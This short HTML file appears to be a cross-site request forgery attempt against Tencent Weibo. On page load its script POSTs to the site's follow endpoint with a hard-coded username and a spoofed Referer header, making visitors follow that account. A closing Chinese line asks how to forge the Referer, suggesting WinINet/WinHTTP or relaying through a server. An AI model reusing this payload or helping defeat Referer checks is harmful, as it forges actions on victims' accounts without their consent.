<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
<meta content="text/html; charset=GB2312" http-equiv="content-type">
<script>var request = false;
if (window.XMLHttpRequest){request = new XMLHttpRequest();}
else if(window.ActiveXObject){request = new ActiveXObject("Microsoft.XMLHTTP");}
else{alert("Javascript must be enabled to continue.");}
request.open('POST', 'http://t.qq.com/follow.php', false);
request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
request.setRequestHeader("Referer", "http://t.qq.com");
request.onreadystatechange = updatePage;
request.send("u=JuncoJet");
function updatePage(){
if (request.readyState == 4)
if (request.status == 200) alert("操作完成");
else if (request.status == 404) alert("Request URL does not exist");
else alert("Error: status code is " + request.status);}</script>
</head></html>
AJAX 不能伪造Referer，到底要嘛才能伪造？使用INET WINHTTP，或者通过网站后台转发？